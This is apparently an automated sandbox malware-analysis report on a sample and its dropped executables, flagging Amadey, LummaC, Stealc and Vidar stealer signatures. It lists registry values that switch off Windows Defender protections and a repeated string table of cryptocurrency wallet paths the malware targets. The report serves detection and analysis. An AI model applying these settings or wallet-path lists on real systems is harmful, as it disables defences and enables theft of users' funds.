Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C83A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6C83A8DC

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C788390 NSS_GetVersion,

0_2_6C788390

Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Source: 06d4af6f50.exe, 0000001E.00000003.3698858088.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3661291599.0000000001830000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3882629165.00000000019CE000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3848410724.00000000019CC000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3848410724.00000000019BB000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3848870098.00000000019AE000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3882352279.00000000019CC000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3848806240.00000000019CE000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3870010104.00000000019CC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 20.2.skotes.exe.780000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.DocumentsKECBGCGCGI.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.2763202923.0000000000621000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2790671022.0000000000781000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 06d4af6f50.exe PID: 7864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 06d4af6f50.exe PID: 5408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 06d4af6f50.exe PID: 8040, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000000.00000003.2174877121.0000000005310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3502627065.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3501473948.0000000000691000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3671582881.0000000000691000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3673961826.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.3612721796.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.3461206243.0000000005040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2675026709.000000000153E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2672659024.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: deb333ea90.exe PID: 2140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: deb333ea90.exe PID: 5940, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 2232, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
